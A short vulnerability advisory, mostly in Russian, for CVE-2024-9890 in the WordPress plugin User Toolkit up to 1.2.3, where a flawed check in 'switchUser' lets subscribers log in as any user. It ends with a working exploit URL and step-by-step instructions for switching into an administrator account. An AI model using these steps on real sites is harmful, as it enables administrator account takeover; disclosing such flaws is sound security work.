
User Toolkit <= 1.2.3 - Аутентифицированный обход аутентификации (Subscriber+)
User Toolkit <= 1.2.3 - Обход аутентификации для аутентифицированных пользователей (Подписчик+)
Плагин User Toolkit для WordPress уязвим к обходу аутентификации в версиях до 1.2.3 включительно. Это связано с некорректной проверкой прав доступа в функции 'switchUser'. Уязвимость позволяет аутентифицированным злоумышленникам с уровнем подписчика и выше входить в систему под любым существующим пользователем сайта, например, администратором.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
Войдите под своим пользователем. Просмотрите исходный код своей страницы профиля, чтобы получить значение nonce. Измените значение user_from на свой ID пользователя. Измените user_id на ID администратора. Готово!